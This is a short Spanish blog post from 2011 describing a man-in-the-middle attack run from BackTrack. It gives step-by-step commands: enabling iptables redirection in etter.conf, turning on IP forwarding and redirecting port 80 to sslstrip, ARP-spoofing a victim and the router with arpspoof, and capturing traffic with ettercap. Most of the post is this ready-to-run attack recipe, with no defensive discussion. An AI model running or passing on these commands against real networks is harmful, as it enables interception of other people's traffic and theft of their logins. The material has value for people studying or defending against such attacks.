miércoles, 13 de julio de 2011

Ataque Man in the middle – Fedora 14 & BackTrack


Después de estudiar este ataque durante una semana, al final lo he concretado.

El ataque MITM es uno de esos ataques en que el atacante debe de estar en la misma red que la victima. No importa el SO de la victima y las herramientas usadas son las siguientes:

  • sslstrip
  • arpspoof
  • ettercap

El ataque lo realice desde Backtrack 4 R2 y fue de la siguiente manera:
Primero editamos el siguiente archivo eliminando “#” para que se vea como acontinuación:

kate /etc/etter.conf  #--------------- #     Linux #---------------  # if you use ipchains:    #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"    #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"  # if you use iptables:    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Despues en otra terminal:

echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 dhclient sslstrip -a -k -f

En otra terminal:

arpspoof -i wlan0 -t ip-victima ip-ruter arpspoof -i wlan0 -t 192.168.1.99 192.168.1.254

y al final en otra terminal:

ettercap -T -q -i wlan0 

En el siguiente video muestro como controlo a 2 maquinas (ssh/vnc) para efectuar el ataque:

http://www.youtube.com/watch?v=LuMtx17ehUQ


No hay comentarios:

Publicar un comentario